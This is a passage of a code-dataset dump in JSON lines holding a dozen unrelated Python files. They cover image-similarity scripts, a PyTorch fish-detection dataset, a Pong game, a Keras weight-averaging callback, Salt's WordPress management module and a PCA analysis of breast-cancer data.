img_vecs_dict[i_key]\n            c_key = w_key + '_' + i_key\n            c_vec = np.hstack([word_vec,img_vec])\n            word_img_list.append((c_key,c_vec)) \n\n#Serialize the result and store it in a file\nwith open(word_img_vecs_file, 'wb') as f:\n    pickle.dump({'word_img_vecs':word_img_list},f)\n\n\n","repo_name":"yuhtangit/cvmwp","sub_path":"combine_vecs.py","file_name":"combine_vecs.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"72632259772","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# detect_similar_images.py\n# Author: Jim Andress\n# Created: 2020-12-29\n\n\nimport argparse\nimport os\nimport pandas as pd\nfrom scipy.spatial.distance import cdist\n\nfrom similar_photo_comparisons.constants import EMBEDDING_DIRECTORY, EMBEDDINGS_FILENAME, SIMILAR_IMAGES_DIRECTORY, SIMILAR_IMAGES_FILENAME\nfrom similar_photo_comparisons.utils import get_categories\n\n\ndef get_similar_images(dataset_dir, cat1, cat2, metric, cutoff):\n    cat1_embeds_df = pd.read_csv(os.path.join(dataset_dir, EMBEDDING_DIRECTORY, cat1, EMBEDDINGS_FILENAME), index_col=0)\n    cat2_embeds_df = pd.read_csv(os.path.join(dataset_dir, EMBEDDING_DIRECTORY, cat2, EMBEDDINGS_FILENAME), index_col=0)\n\n    dists = cdist(cat1_embeds_df.values, cat2_embeds_df.values, metric=metric)\n    dists_df = pd.DataFrame(dists, columns=cat2_embeds_df.index, index=cat1_embeds_df.index).reset_index().rename(columns={'index': 'cat1_filepath'})\n\n    dists_df = pd.melt(dists_df, id_vars=['cat1_filepath'], value_vars=cat2_embeds_df.index, var_name='cat2_filepath', value_name='distance')\n    dists_df['cat1'] = cat1\n    dists_df['cat2'] = cat2\n    return dists_df[dists_df.distance <= cutoff]\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"Finds similar image pairs\",\n                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n    parser.add_argument(\"--dataset_directory\", type=str, required=True,\n                        help=\"Path to the directory where the dataset is saved\")\n    parser.add_argument(\"--max_distance\", type=float, required=False, default=5.0,\n                        help=\"The cutoff above which images are not similar\")\n    parser.add_argument(\"--dist_metric\", type=str, required=False, default='euclidean',\n                        help=\"The distance metric used to compute similar images\")\n\n    args = parser.parse_args()\n\n    dataset_dir = args.dataset_directory\n\n    categories = get_categories(dataset_dir)\n\n    print(f'Found categories: {categories}')\n\n    os.makedirs(os.path.join(dataset_dir, SIMILAR_IMAGES_DIRECTORY), exist_ok=True)\n\n    for cat1 in categories:\n        for cat2 in categories:\n            if cat1 >= cat2:\n                continue\n\n            print(f'Computing similar images for categories {cat1} and {cat2}')\n            similar_imgs_df = get_similar_images(dataset_dir, cat1, cat2, args.dist_metric, args.max_distance)\n            similar_imgs_df.to_csv(os.path.join(dataset_dir, SIMILAR_IMAGES_DIRECTORY, f'{SIMILAR_IMAGES_FILENAME}_{cat1}_{cat2}.csv'), index=False)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jandress94/similar_photo_comparisons","sub_path":"similar_photo_comparisons/similarity_detection/detect_similar_images.py","file_name":"detect_similar_images.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"21842659408","text":"import os\nimport numpy as np\nimport random\nimport json\n\n# CV\nimport cv2\n\n# Pytorch\nimport torch\nfrom torch.utils.data import Dataset\n\n# Albumenatations\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\n\nimport sys\nsys.path.append('/workspaces/SchoolOfFishDetection_Pytorch/develop/')\nimport utils.transforms.transforms_alb as MT\n\nclasses = {\n    'Breezer School': 0,\n    'Jumper School': 1,\n    'Dolphin': 2,\n    'Bird': 3,\n    'Object': 4,\n    'Cloud': 5,\n    'Ripple': 6,\n    'Smooth Surface': 7,\n    'Wake': 8,\n    'Each Fish': 9,\n    'w': 10,\n}\n\n\nclass SchoolOfFishDataset(Dataset):\n    def __init__(self, img_dir, ann_dir, ids, transforms=None):\n        self.img_dir = img_dir\n        self.ann_dir = ann_dir\n        self.ids = ids\n\n        self.imgs = list(sorted(os.listdir(self.img_dir)))\n        self.anns = list(sorted(os.listdir(self.ann_dir)))\n        self.transforms = transforms\n\n    def __len__(self) -> int:\n        return self.ids.shape[0]\n\n    def __getitem__(self, index):\n        idx = self.ids[index]\n\n        # load images and annotations\n        img_path = os.path.join(self.img_dir, self.imgs[idx])\n        ann_path = os.path.join(self.ann_dir, self.anns[idx])\n\n        img = cv2.imread(img_path, cv2.IMREAD_COLOR)\n        img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGB).astype(np.float32)\n        img /= 255.0\n        h, w, _ = img.shape  # (h,w,c)\n\n        # DETR takes in data in yolo format\n        boxes = []\n        labels = []\n        with open(ann_path) as f:\n            df = json.load(f)\n            for k, v in df['labels'].items():\n                boxes.extend(v)\n                labels.extend([k] * len(v))\n\n        boxes = np.array(boxes, dtype=np.float32)\n\n        # Area of bb\n        area = boxes[:, 2] * boxes[:, 3]\n        area = torch.as_tensor(area, dtype=torch.float32)\n\n        boxes[:, 0::2].clip(min=0, max=w)\n        boxes[:, 1::2].clip(min=0, max=h)\n\n        try:\n            labels = [classes[x] for x in labels]\n        except KeyError:\n            print('No such key.\\n' + f'nanno_file:{self.anns[idx]}')\n\n        labels = np.array(labels, dtype=np.int32)\n\n        if self.transforms:\n            sample = {\n                'image': img,\n                'bboxes': boxes,\n                'labels': labels\n            }\n            sample = self.transforms(**sample)\n            img = sample['image']\n            boxes = sample['bboxes']\n            labels = sample['labels']\n\n        __, h, w = img.shape  # (c, h, w)\n\n        target = {}\n        target['boxes'] = torch.as_tensor(boxes, dtype=torch.float32)\n        target['labels'] = torch.as_tensor(labels, dtype=torch.long)\n        target['image_id'] = torch.tensor([idx])\n        # target['area'] = area\n\n        return img, target, idx\n\n\nclass SchoolOfFishTestDataset(Dataset):\n\n    def __init__(self, dataframe, image_dir, transforms=None):\n        super().__init__()\n\n        self.image_ids = dataframe['image_id'].unique()\n        self.df = dataframe\n        self.image_dir = image_dir\n        self.transforms = transforms\n\n    def __getitem__(self, index: int):\n\n        image_id = self.image_ids[index]\n        # records = self.df[self.df['image_id'] == image_id]\n\n        image = cv2.imread(\n            f'{self.image_dir}/{image_id}.jpg',\n            cv2.IMREAD_COLOR)\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB).astype(np.float32)\n        image /= 255.0\n\n        if self.transforms:\n            sample = {\n                'image': image,\n            }\n            sample = self.transforms(**sample)\n            image = sample['image']\n\n        return image, image_id\n\n    def __len__(self) -> int:\n        return self.image_ids.shape[0]\n\n\ndef get_train_transforms():\n    return A.Compose(\n        [\n            A.OneOf(\n                [\n                    A.HueSaturationValue(hue_shift_limit=0.2,\n                                         sat_shift_limit=0.2,\n                                         val_shift_limit=0.2,\n                                         p=0.9),\n                    A.RandomBrightnessContrast(brightness_limit=0.2,\n                                               contrast_limit=0.2,\n                                               p=0.9)\n                ],\n                p=0.9\n            ),\n            A.ToGray(p=0.01),\n            A.HorizontalFlip(p=0.5),  # ng\n            A.VerticalFlip(p=0.5),  # ng\n            A.Resize(height=512, width=512, p=1),  # ng\n            A.Cutout(\n                num_holes=8,\n                max_h_size=64,\n                max_w_size=64,\n                fill_value=0,\n                p=0.5),\n            ToTensorV2(p=1.0)\n        ],\n        p=1.0,\n        bbox_params=A.BboxParams(\n            format='pascal_voc',\n            min_area=0,\n            min_visibility=0,\n            label_fields=['labels'])\n    )\n\n\ndef get_train_transforms_v2():\n    return A.Compose(\n        [\n            A.OneOf(\n                [\n                    # 色相\n                    A.HueSaturationValue(hue_shift_limit=0.2,\n                                         sat_shift_limit=0.2,\n                                         val_shift_limit=0.2,\n                                         p=0.3),\n                    # 明るさとコントラスト\n                    A.RandomBrightnessContrast(brightness_limit=0.2,\n                                               contrast_limit=0.2,\n                                               p=0.3),\n                    # RGBの各チャンネル\n                    A.RGBShift(r_shift_limit=20 / 255,\n                               g_shift_limit=20 / 255,\n                               b_shift_limit=10 / 255,\n                               p=0.3),\n                ],\n                p=0.2\n            ),\n            A.OneOf(\n                [\n                    # ガンマ変換\n                    A.RandomGamma(gamma_limit=(80, 120), p=0.3),\n                    # ぼかし\n                    A.Blur(p=0.6),\n                    # シャープネス\n                    A.IAASharpen(p=0.6),\n                    # ガウスノイズ\n                    A.GaussNoise(var_limit=(0.01, 0.05), mean=0, p=0.05),\n                    # グレースケール\n                    A.ToGray(p=0.05)\n                ],\n                p=0.2\n            ),\n            A.OneOf(\n                [\n                    # 水平に反転\n                    A.HorizontalFlip(p=1),\n                    # 垂直に反転\n                    A.VerticalFlip(p=1),\n                    # 転置\n                    A.Transpose(p=1),\n                    # 90°単位で回転\n                    A.RandomRotate90(p=1)\n                ],\n                p=1\n            ),\n            # 霧をシミュレート\n            A.RandomFog(fog_coef_lower=0.1, fog_coef_upper=0.2, p=0.05),\n            # リサイズ\n            A.Resize(height=512, width=512, p=1),\n            # 矩形領域の粗いDropout\n            A.Cutout(num_holes=random.randint(1, 6),\n                     max_h_size=64,\n                     max_w_size=64,\n                     fill_value=0,\n                     p=0.15),\n            # torch tensor\n            ToTensorV2(p=5.0),\n        ],\n        p=1.0,\n        bbox_params=A.BboxParams(format='pascal_voc',\n                                 min_area=0,\n                                 min_visibility=0,\n                                 label_fields=['labels'])\n    )\n\n\ndef get_train_transforms_detr():\n    scales = [480, 512, 544, 576, 608, 640, 672, 704, 736, 768, 800]\n\n    return A.Compose(\n        [\n            # 水平に反転\n            A.HorizontalFlip(p=0.5),\n            A.OneOf([\n                MT.CustomRandomResize(scales, max_size=1333, p=0.5),\n                A.Compose(\n                    [\n                        MT.CustomRandomResize([400, 500, 600]),\n                        MT.CustomRandomSizedCrop(384, 600),\n                        MT.CustomRandomResize(scales, max_size=1333)\n                    ],\n                    p=0.5\n                )\n            ]),\n            A.Normalize([0.485, 0.456, 0.406],\n                        [0.229, 0.224, 0.225],\n                        max_pixel_value=1),\n            ToTensorV2(),\n        ],\n        p=1.0,\n        bbox_params=A.BboxParams(format='pascal_voc',\n                                 min_area=0,\n                                 min_visibility=0,\n                                 label_fields=['labels'])\n    )\n\n\ndef get_valid_transforms():\n    return A.Compose([A.Resize(height=512,\n                               width=512,\n                               p=1.0),\n                      ToTensorV2(p=1.0)],\n                     p=1.0,\n                     bbox_params=A.BboxParams(format='pascal_voc',\n                                              min_area=0,\n                                              min_visibility=0,\n                                              label_fields=['labels']))\n\n\ndef get_valid_transforms_detr():\n    return A.Compose(\n        [\n            MT.CustomRandomResize([800], max_size=1333),\n            A.Normalize([0.485, 0.456, 0.406],\n                        [0.229, 0.224, 0.225],\n                        max_pixel_value=1),\n            ToTensorV2(),\n        ],\n        p=1.0,\n        bbox_params=A.BboxParams(format='pascal_voc',\n                                 min_area=0,\n                                 min_visibility=0,\n                                 label_fields=['labels'])\n    )\n\n\ndef get_test_transform():\n    return A.Compose([A.Resize(height=512,\n                               width=512,\n                               p=1.0),\n                      ToTensorV2(p=1.0)],\n                     p=1.0\n                     )\n","repo_name":"kkkkkevin/Pytorch_Utils","sub_path":"custom_datasets/schooloffish_dataset.py","file_name":"schooloffish_dataset.py","file_ext":"py","file_size_in_byte":9708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"17035112931","text":"from typing import List\n\n\nclass Solution:\n    def partition(self, s: str) -> List[List[str]]:\n        len_ = len(s)\n        dp = [[0] * len_ for _ in range(len_)]  # 预处理动态规划求回文串-重要!\n        for i in range(len_):\n            dp[i][i] = 1\n        for k in range(1, len_):\n            for i in range(len(s) - k):\n                if k == 1:\n                    dp[i][i + k] = s[i] == s[i + k]\n                else:\n                    dp[i][i + k] = dp[i + 1][i + k - 1] if s[i] == s[i + k] else 0\n        ans = []\n\n        def digui(begin, len_, temp):  # 回溯\n            if begin == len_:\n                ans.append(temp.copy())\n                return\n            for i in range(begin, len_):\n                if dp[begin][i] == 1:\n                    temp.append(s[begin:i + 1])\n                    digui(i + 1, len_, temp)\n                    temp.pop()\n\n        digui(0, len_, [])\n        return ans\n","repo_name":"ZZHbible/leetcode","sub_path":"leetcode131-分割回文串-重要!!.py","file_name":"leetcode131-分割回文串-重要!!.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"36845768568","text":"import time\nfrom turtle import Screen\nfrom ball import Ball\nfrom paddle import Paddle\nfrom score import Scoreboard\n\nR_COORDINATES = (350,0)\nL_COORDINATES = (-350,0)\n\nscreen = Screen()\n\nscreen.setup(800,600)\nscreen.bgcolor(\"black\")\nscreen.title(\"Ping Pong\")\nscreen.tracer(0)\n\nl_paddle = Paddle(L_COORDINATES)\nr_paddle = Paddle(R_COORDINATES)\nball = Ball()\nscore = Scoreboard()\n\nscreen.listen()\nscreen.onkey(l_paddle.move_up, \"w\")\nscreen.onkey(l_paddle.move_down, \"s\")\nscreen.onkey(r_paddle.move_up, \"i\")\nscreen.onkey(r_paddle.move_down, \"k\")\n\ngame_is_on = True\nwhile game_is_on:\n    time.sleep(ball.move_speed)\n    screen.update()\n    ball.move()\n\n    #Detect collision with wall\n    if ball.ycor() > 280 or ball.ycor() < -280:\n        ball.bounce_y()\n\n    #Detect collision with paddle\n    if ball.distance(r_paddle) < 50 and ball.xcor() > 320 or ball.distance(l_paddle) < 50 and ball.xcor() < -320:\n        ball.bounce_x()\n\n    #Detect when paddle misses\n    if ball.xcor() > 380:\n        ball.restart()\n        score.l_point()\n\n    if ball.xcor() < -380:\n        ball.restart()\n        score.r_point()\n\nscreen.exitonclick()","repo_name":"Chescore/Python_Projects","sub_path":" 22 - Ping Pong/ping_pong.py","file_name":"ping_pong.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"15581767932","text":"# third party\nfrom scipy import io\n\n\ndef load_dataset() -> None:\n    FILEPATH = \"data/hs_bearing_1/hs_bearing_1/sensor-20130307T015746Z.mat\"\n    # var = h5py.File(FILEPATH, \"r\")\n    var = io.loadmat(FILEPATH)\n    for key, item in var.items():\n        print(key, item)\n\n\nif __name__ == \"__main__\":\n    load_dataset()\n","repo_name":"iimuz/til","sub_path":"machine_learning/wind_turbine_high_speed_bearing_prognosis/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"}
+{"seq_id":"22540604124","text":"#!/usr/bin/env python\n# pylint:disable=missing-docstring\nfrom contextlib import suppress\n\nfrom ray.rllib.rollout import create_parser, run\n\nimport raylab\n\n\ndef main():\n    raylab.register_all_agents()\n    raylab.register_all_environments()\n    with suppress(KeyboardInterrupt):\n        parser = create_parser()\n        args = parser.parse_args()\n        run(args, parser)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"0xangelo/raylab","sub_path":"scripts/rollout.py","file_name":"rollout.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"78"}
create_parser()\n args = parser.parse_args()\n run(args, parser)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"0xangelo/raylab","sub_path":"scripts/rollout.py","file_name":"rollout.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"78"} +{"seq_id":"72186037692","text":"from oit.support.core import Scenarios, Scenario\n\n\nclass GenericClassFactory:\n @staticmethod\n def create(className, properties):\n TestClass = GenericClassFactory.__createInstance(className)\n # create the instance before setting attributes to overwrite defaults\n testInstance = TestClass()\n\n # set test class attributes\n for property in properties:\n setattr(testInstance, property, properties[property])\n\n testInstance.prepare()\n\n return testInstance\n\n @staticmethod\n def __createInstance(className):\n parts = className.split('.')\n module = \".\".join(parts[:-1])\n m = __import__(module)\n for comp in parts[1:]:\n m = getattr(m, comp)\n return m\n\n\nclass ScenariosFactoryParser():\n requestCommandBuilder = None\n\n @staticmethod\n def parse(scenariosData):\n scenarios = Scenarios()\n for scenario in scenariosData:\n ScenariosFactoryParser.ScenarioParser.parse(scenarios, scenariosData[scenario])\n return scenarios\n\n class TestsParser:\n @staticmethod\n def parse(scenario, testsData):\n for package in testsData:\n for testClass in testsData[package]:\n for key in testClass.keys():\n className = \"oit.scenarios.%s.%s\" % (package, key)\n test = GenericClassFactory.create(className, testClass[key])\n test.setRequestCommandBuilder(ScenariosFactoryParser.requestCommandBuilder)\n scenario.addTest(test)\n\n class ScenarioParser():\n @staticmethod\n def parse(scenarios, scenarioData):\n scenario = Scenario(scenarioData['name'])\n ScenariosFactoryParser.TestsParser.parse(scenario, scenarioData['tests'])\n scenarios.addScenario(scenario)\n return scenario\n\n","repo_name":"obiba/opal-integration-tests","sub_path":"src/main/python/oit/support/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38233429414","text":"import argparse\nimport time\n\nfrom kleio.core.cli.base import get_trial_from_short_id\nfrom kleio.core.trial.base import Trial\nfrom kleio.core.io.trial_builder import TrialBuilder\nfrom kleio.core.evc.trial_node import TrialNode\nfrom kleio.core.wrapper import Consumer\n\n\nSUSPENSION_FAILED = \"\"\"\nError: Trial {trial.short_id} stopped for another reason and now has status '{trial.status}'\n\ntail stdout:\n{stdout}\n\ntail stderr:\n{stderr}\n\nFor a complete log of the trial use command\n$ kleio cat {trial.short_id}\n\"\"\"\n\n\ndef add_subparser(parser):\n \"\"\"Return the parser that needs to be used for this command\"\"\"\n suspend_parser = parser.add_parser('suspend', help='suspend help')\n\n suspend_parser.add_argument(\n 'id', help=\"id of the trial. 
Can be name or hash.\")\n\n suspend_parser.set_defaults(func=main)\n\n return suspend_parser\n\n\ndef main(args):\n database = TrialBuilder().build_database(args)\n trial = TrialNode.load(get_trial_from_short_id(args, args.pop('id'))['_id'])\n\n requested = False\n while not requested:\n try:\n trial.suspend()\n requested = True\n except RuntimeError as e:\n if \"Trial status changed meanwhile.\" not in str(e):\n raise\n\n trial.update()\n\n trial.save()\n print(\"Request to suspend Trial {trial.short_id} has been registered\".format(trial=trial))\n print(\"Waiting for confirmation...\")\n\n suspended = False\n while not suspended:\n document = database.read(Trial.trial_report_collection, {'_id': trial.id}, {'registry.status': 1})[0]\n suspended = document['registry']['status'] == \"suspended\"\n\n if not suspended and document['registry']['status'] not in status.INTERRUPTABLE:\n print(SUSPENSION_FAILED.format(\n trial=trial, stdout=trial.stdout[-10:], stderr=trial.stderr[-10:]))\n\n print(\"Trial {trial.short_id} suspended successfully\".format(trial=trial))\n","repo_name":"Epistimio/kleio","sub_path":"src/kleio/core/cli/suspend.py","file_name":"suspend.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"4851543407","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\npaper implementaton:\nStochastic Weight Averaging: https://arxiv.org/abs/1803.05407\n\n\"\"\"\n\nimport keras as K\n\n\nclass SWA(K.callbacks.Callback):\n\n def __init__(self, filepath, SWA_START):\n super(SWA, self).__init__()\n self.filepath = filepath\n self.SWA_START = SWA_START\n\n def on_train_begin(self, logs=None):\n self.nb_epoch = self.params['epochs']\n print('Stochastic weight averaging selected for last {} epochs.'\n .format(self.nb_epoch - self.SWA_START))\n\n def on_epoch_begin(self, epoch, logs=None):\n lr = float(K.backend.get_value(self.model.optimizer.lr))\n print('learning rate of current epoch is : {}'.format(lr))\n\n def on_epoch_end(self, epoch, logs=None):\n if epoch == self.SWA_START:\n self.swa_weights = self.model.get_weights()\n\n elif epoch > self.SWA_START:\n for i, layer in enumerate(self.model.layers):\n self.swa_weights[i] = (self.swa_weights[i] *\n (epoch - self.SWA_START) + self.model.get_weights()[i]) / (\n (epoch - self.SWA_START) + 1)\n else:\n pass\n\n def on_train_end(self, logs=None):\n self.model.set_weights(self.swa_weights)\n print('set stochastic weight average as final model parameters [FINISH].')\n # self.model.save_weights(self.filepath)\n # print('save final stochastic averaged weights model to file [FINISH].')\n \n \nclass LearningRateDisplay(K.callbacks.Callback):\n def on_epoch_begin(self, epoch, logs=None):\n lr = float(K.backend.get_value(self.model.optimizer.lr))\n print('learning rate of current epoch is : {}'.format(lr))","repo_name":"Fieldhunter/2020-ZhanJiang-Underwater-Object-Detection-Algorithm-Contest","sub_path":"swa.py","file_name":"swa.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"12847872444","text":"\"\"\"\nThis module is used to manage Wordpress installations\n\n:depends: wp binary from http://wp-cli.org/\n\"\"\"\n\n# Import Python Modules\n\nimport collections\n\n# Import Salt Modules\nimport salt.utils.path\n\nPlugin = collections.namedtuple(\"Plugin\", \"name status update versino\")\n\n\ndef __virtual__():\n if 
salt.utils.path.which(\"wp\"):\n return True\n return (False, \"Missing dependency: wp\")\n\n\ndef _get_plugins(stuff):\n return Plugin(stuff)\n\n\ndef list_plugins(path, user):\n \"\"\"\n List plugins in an installed wordpress path\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.list_plugins /var/www/html apache\n \"\"\"\n ret = []\n resp = __salt__[\"cmd.shell\"](\"wp --path={} plugin list\".format(path), runas=user)\n for line in resp.split(\"\\n\")[1:]:\n ret.append(line.split(\"\\t\"))\n return [plugin.__dict__ for plugin in map(_get_plugins, ret)]\n\n\ndef show_plugin(name, path, user):\n \"\"\"\n Show a plugin in a wordpress install and check if it is installed\n\n name\n Wordpress plugin name\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.show_plugin HyperDB /var/www/html apache\n \"\"\"\n ret = {\"name\": name}\n resp = __salt__[\"cmd.shell\"](\n \"wp --path={} plugin status {}\".format(path, name), runas=user\n ).split(\"\\n\")\n for line in resp:\n if \"Status\" in line:\n ret[\"status\"] = line.split(\" \")[-1].lower()\n elif \"Version\" in line:\n ret[\"version\"] = line.split(\" \")[-1].lower()\n return ret\n\n\ndef activate(name, path, user):\n \"\"\"\n Activate a wordpress plugin\n\n name\n Wordpress plugin name\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.activate HyperDB /var/www/html apache\n \"\"\"\n check = show_plugin(name, path, user)\n if check[\"status\"] == \"active\":\n # already active\n return None\n resp = __salt__[\"cmd.shell\"](\n \"wp --path={} plugin activate {}\".format(path, name), runas=user\n )\n if \"Success\" in resp:\n return True\n elif show_plugin(name, path, user)[\"status\"] == \"active\":\n return True\n return False\n\n\ndef deactivate(name, path, user):\n \"\"\"\n Deactivate a wordpress plugin\n\n name\n Wordpress plugin name\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.deactivate HyperDB /var/www/html apache\n \"\"\"\n check = show_plugin(name, path, user)\n if check[\"status\"] == \"inactive\":\n # already inactive\n return None\n resp = __salt__[\"cmd.shell\"](\n \"wp --path={} plugin deactivate {}\".format(path, name), runas=user\n )\n if \"Success\" in resp:\n return True\n elif show_plugin(name, path, user)[\"status\"] == \"inactive\":\n return True\n return False\n\n\ndef is_installed(path, user=None):\n \"\"\"\n Check if wordpress is installed and setup\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. 
code-block:: bash\n\n salt '*' wordpress.is_installed /var/www/html apache\n \"\"\"\n retcode = __salt__[\"cmd.retcode\"](\n \"wp --path={} core is-installed\".format(path), runas=user\n )\n if retcode == 0:\n return True\n return False\n\n\ndef install(path, user, admin_user, admin_password, admin_email, title, url):\n \"\"\"\n Run the initial setup functions for a wordpress install\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n admin_user\n Username for the Administrative user for the wordpress install\n\n admin_password\n Initial Password for the Administrative user for the wordpress install\n\n admin_email\n Email for the Administrative user for the wordpress install\n\n title\n Title of the wordpress website for the wordpress install\n\n url\n Url for the wordpress install\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.install /var/www/html apache dwallace password123 \\\n dwallace@example.com \"Daniel's Awesome Blog\" https://blog.dwallace.com\n \"\"\"\n retcode = __salt__[\"cmd.retcode\"](\n 'wp --path={} core install --title=\"{}\" --admin_user={} '\n \"--admin_password='{}' --admin_email={} --url={}\".format(\n path, title, admin_user, admin_password, admin_email, url\n ),\n runas=user,\n )\n\n if retcode == 0:\n return True\n return False\n","repo_name":"saltstack/salt","sub_path":"salt/modules/wordpress.py","file_name":"wordpress.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"14410186722","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\n\nwith open('README.rst') as f:\n readme = f.read()\n\nsetup(\n name='scrabble_challenge',\n version='0.1.0',\n description='Scrabble coding challenge. 
Tells you the best Scrabble words given a particular Scrabble rack.',\n long_description=readme,\n author='Keith Johnson',\n author_email='kjohnson0451@gmail.com',\n url='https://github.com/kjohnson0451/scrabble-challenge',\n packages=find_packages(exclude=('tests', 'docs'))\n)\n\n","repo_name":"kjohnson0451/scrabble-challenge","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7330426895","text":"\"\"\"Principal Component Analysis\"\"\"\n\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndf1=pd.read_excel(\"breast-cancer-wisconsin.xlsx\")\ndf1=df1.fillna(df1.mean()) #replace the NaN with the mean of the column\npca_var_list=[]\n\npca = PCA()\npca.fit(df1.drop([\"code\",\"class\"],axis=1)) #remove the 'code' and 'class' columns when fitting\nfor i in range(len(pca.explained_variance_ratio_)):\n if i==0:\n pca_var_list.append(pca.explained_variance_ratio_[0])\n else: pca_var_list.append(pca_var_list[i-1]+pca.explained_variance_ratio_[i])\n\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nax.set_ylim(0.65,1)\nplt.savefig(\"Fraction_of_variance.pdf\",dpi=100) #save the figure\n\nreduced=pca.transform(df1.drop([\"code\",\"class\"],axis=1)) #the result is a 699*9 numpy.ndarray\nreduced_df1=pd.DataFrame(reduced) #transform the numpy.ndarray to a pandas dataframe\n#print(reduced_df1)\nreduced_df1[\"class\"]=df1[\"class\"] #add the class information to each sample of the transformed matrix\ngrouped = reduced_df1.groupby('class') #group by class\n\nplt.figure() #open a new figure\n#plot the diagonal cells of the matrix\nfor i in range(5):\n ax=plt.subplot(5,5,6*i+1) #for matrix diagonal\n x = grouped.get_group(2)[i] # 2-benign\n y = grouped.get_group(4)[i] # 4-malignant\n x.plot.kde(label=\"benign\",c='r') #density plot\n y.plot.kde(label=\"malignant\",c='c')\n plt.xticks(fontsize=8)\n plt.yticks(fontsize=8) #make the y axis fontsize smaller\n plt.subplots_adjust(hspace=0.2)\n plt.subplots_adjust(wspace=0.2)\n if i==0:\n ax.set_ylabel('Density')\n else:\n ax.set_ylabel('')\n ax.set_title(\"No.{} component\".format(i+1),fontsize=10)\n ttl = ax.title\n ttl.set_position([0.5, 1.02]) # set position of the title\n plt.legend(bbox_to_anchor=(1, 1),fontsize=6) #adjust the location of the legend box\n\nfor i in range(5):\n for j in range(5):\n if i!=j: #off-diagonal cells\n plt.subplot(5, 5, i*5+j+1)\n x_2 = grouped.get_group(2)[i]\n y_2 = grouped.get_group(2)[j]\n plt.scatter(y_2, x_2, alpha=0.5, c=\"r\",s=5, edgecolors='none') #use square root to make the contrast between the size of the biggest points and smallest points not so big\n\n x_4 = grouped.get_group(4)[i]\n y_4 = grouped.get_group(4)[j]\n plt.scatter(y_4,x_4, alpha=0.5, c=\"c\",s=5,edgecolors='none') # use square root to make the contrast between the size of the biggest points and smallest points not so big\n plt.xticks(fontsize=8)\n plt.yticks(fontsize=8)\n\n plt.subplots_adjust(hspace=0.2)\n plt.subplots_adjust(wspace=0.2)\n ax=plt.gca()\n\nfig = plt.gcf() #get current figure\nfig.set_size_inches(15, 15)\nplt.savefig(\"Assignment4.pdf\",dpi=200) #save the figure\n\nid_outlier=abs(reduced_df1[3]-reduced_df1[3].mean()).idxmax() #return the 
